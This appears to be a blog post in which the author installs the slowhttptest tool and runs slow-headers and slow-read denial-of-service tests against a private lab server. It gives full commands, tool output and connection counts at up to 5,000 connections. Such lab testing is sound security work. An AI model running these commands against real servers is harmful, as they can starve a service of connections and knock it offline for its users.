about slowhttptest
This tool can enables you to do slow read DoS attack , which might lead a server to TCP starvation.
my understanding is correct ??
I am not familiar with security related techniques :(
Anyway let’s try!
[ installation ]
download a source code from https://code.google.com/p/slowhttptest/
# tar xzvf slowhttptest-1.5.tar.gz
# cd slowhttptest-1.5/
# ./configure
# make
# make install
|
how to use
please check the web site or “man slowhttptest”
[ sample usage ]
EXAMPLES
Start a slowloris test of host.example.com with 1000 connections, statistics goes into my_header_stats, interval between fol-
low up headers is 10 seconds and connection rate is 200 connections per second:
$ slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://host.example.com/index.html -x 24 -p 3
|
try this example.
# slowhttptest -c 1000 -H -g -o my_header_stats -i 1 -r 200 -t GET -u http://192.168.10.236 -x 24 -p 3
Fri Jun 7 21:50:27 2013:
Using:
test type: SLOW HEADERS
number of connections: 1000
URL: http://192.168.10.236/
verb: GET
Content-Length header value: 4096
follow up data max size: 52
interval between follow up data: 1 seconds
connections per seconds: 200
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Fri Jun 7 21:50:27 2013:slow HTTP test status on 0th second:
initializing: 0
pending: 1
connected: 0
error: 0
closed: 0
service available: YES
<snip>
Fri Jun 7 21:54:27 2013:slow HTTP test status on 240th second:
initializing: 0
pending: 0
connected: 1000
error: 0
closed: 0
service available: YES
Fri Jun 7 21:54:28 2013:
Using:
test type: SLOW HEADERS
number of connections: 1000
URL: http://192.168.10.236/
verb: GET
Content-Length header value: 4096
follow up data max size: 52
interval between follow up data: 1 seconds
connections per seconds: 200
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Fri Jun 7 21:54:28 2013:Test ended on 241th second
status: Hit test time limit
|
on the target server during the testing
open about 1,000 concurrent TCP connections.
# netstat -an | grep -i tcp | grep 80 | wc -l
1007
|
view result files with an web browser.
# ls my_header_stats.*
my_header_stats.csv my_header_stats.html
|
establish 5,000 concurrent TCP connections.
# slowhttptest -X -H -g -o result2 -w 1 -c 5000 -y 1 -t GET -u http://192.168.10.236
<snip>
Using:
test type: SLOW HEADERS
number of connections: 4090
URL: http://192.168.10.236/
verb: GET
Content-Length header value: 4096
follow up data max size: 68
interval between follow up data: 10 seconds
connections per seconds: 50
probe connection timeout: 5 seconds
test duration: 240 seconds
using proxy: no proxy
Fri Jun 7 22:10:11 2013:Test ended on 241th second
status: Hit test time limit
|
-w : window size the client notify to the server ( minimum )
-y : window size the client notify to the server ( maximum )
on the server
# netstat -an | grep 80 | wc -l
4106
|
capture data
Window scale: 7 (multiply by 128)
Kind: Window Scale (3)
.... 0... .... = Congestion Window Reduced (CWR): Not set
Window size value: 115
[Calculated window size: 14720]
|
the server sent very small size packets.
$ tshark -r aa.pcap -V -R '(ip.src==192.168.10.236)' -V | less | grep ^Frame | head -5
Frame 2: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface 0
Frame 5: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) on interface 0
|
how about this ?
established 5,000 concurrent TCP connections.
# slowhttptest -g -o result_file -c 5000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://192.168.10.236 -p 5 –l 350
<snip>
Using:
test type: SLOW READ
number of connections: 5000
URL: http://192.168.10.236/
verb: GET
receive window range: 10 - 20
pipeline factor: 1
read rate from receive buffer: 32 bytes / 5 sec
connections per seconds: 1000
probe connection timeout: 5 seconds
test duration: 350 seconds
using proxy: no proxy
Fri Jun 7 23:14:32 2013:Test ended on 351th second
|
on the server
# netstat -an | grep 80 | wc -l
5016
|
result file
interesting tool.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.